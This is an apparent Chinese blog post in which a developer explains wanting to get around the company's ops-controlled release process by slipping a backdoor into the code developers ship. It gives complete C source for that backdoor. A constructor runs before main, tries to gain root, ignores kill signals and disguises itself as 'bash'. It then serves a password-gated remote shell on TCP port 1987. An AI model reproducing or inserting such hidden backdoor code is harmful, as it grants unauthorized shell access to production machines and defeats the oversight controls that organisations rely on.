今天忽然萌生一个邪恶的想法,公司上线流程极其繁琐,是不是可以考虑自己上线呢。之前自己搞过提权上线,但是并不是每台机器都有漏洞的,新机器漏洞补的比较勤,难以提权。
OP有权限操作线上机器,RD木有权限,但是RD有写代码的权限,如果给我们的代码加上一个后门就可以自由上线了,规避OP的限制。
代码极其简单,修改了一下xbind,主要增加了信号处理函数、使用attribute指定main前运行、设置进程名。现在遗憾的是没有搞定进程title,如果搞定进程title就可以以假乱真了。
- #include <stdio.h>
-
#include <stdlib.h>
-
#include <string.h>
-
#include <unistd.h>
-
#include <signal.h>
-
#include <sys/types.h>
-
#include <sys/socket.h>
-
#include <netinet/in.h>
-
#include <sys/prctl.h>
-
-
#define ENTERPASS "Enert your password: \0"
-
#define WELCOME "Welcome to shell\r\nlet's do it:\r\n"
-
#define PASSWORD "123abc!@#"
-
#define PORT 1987
-
-
__attribute__((constructor))
-
int init_backdoor()
-
{
-
struct sockaddr_in s_addr;
-
struct sockaddr_in c_addr;
-
char buf[1024] = {0};
-
pid_t pid = 0;
-
int i = 0,sock_descriptor = 0,temp_sock_descriptor = 0,c_addrsize = 0;
-
-
setuid(0);
-
setgid(0);
-
seteuid(0);
-
setegid(0);
-
-
pid = fork();
-
if(pid)
-
return 0;
-
-
signal(SIGINT, SIG_IGN);
-
signal(SIGPIPE, SIG_IGN);
-
signal(SIGTERM, SIG_IGN);
-
const char *proc_title = "bash";
-
const char *proc_name = "bash";
-
prctl(PR_SET_NAME, proc_name);
-
-
sock_descriptor=socket(AF_INET,SOCK_STREAM,0);
-
if (socket(AF_INET,SOCK_STREAM,0)==-1){
-
//printf("socket failed!");
-
exit(1);
-
}
-
memset(&s_addr,0,sizeof(s_addr));
-
//bzero(&s_addr,sizeof(s_addr));
-
s_addr.sin_family=AF_INET;
-
s_addr.sin_addr.s_addr=htonl(INADDR_ANY);
-
s_addr.sin_port=htons(PORT);
-
if (bind(sock_descriptor,(struct sockaddr *)&s_addr,sizeof(s_addr))==-1){
-
//printf("bind failed!");
-
exit(1);
-
}
-
if (listen(sock_descriptor,20)==-1)//accept 20 connections
-
{
-
//printf("listen failed!");
-
exit(1);
-
}
-
c_addrsize=sizeof(c_addr);
-
-
while(1)
-
{
-
temp_sock_descriptor=accept(sock_descriptor,(struct sockaddr *)&c_addr,&c_addrsize);
-
//recv
-
while(temp_sock_descriptor)
-
{
-
pid=fork();
-
if (pid>0) {
-
close(temp_sock_descriptor);
-
temp_sock_descriptor = 0;
-
continue;
-
}else if (pid==0){
-
write(temp_sock_descriptor, ENTERPASS, strlen(ENTERPASS));
-
memset(buf, '\0', 1024);
-
recv(temp_sock_descriptor, buf, 1024, 0);
-
-
if (strncmp(buf,PASSWORD,5) !=0){
-
close(temp_sock_descriptor);
-
temp_sock_descriptor = 0;
-
exit(1);
-
}
-
-
write(temp_sock_descriptor, WELCOME, strlen(WELCOME));
-
dup2(temp_sock_descriptor,0);
-
dup2(temp_sock_descriptor,1);
-
dup2(temp_sock_descriptor,2);
-
execl("/bin/sh", "sh", (char *) 0);
-
close(temp_sock_descriptor);
-
temp_sock_descriptor = 0;
-
exit(0);
-
-
}else{
-
exit(1);
-
}
-
}
-
}
-
-
close(sock_descriptor);
-
return 0;
-
}
阅读(8259) | 评论(0) | 转发(0) |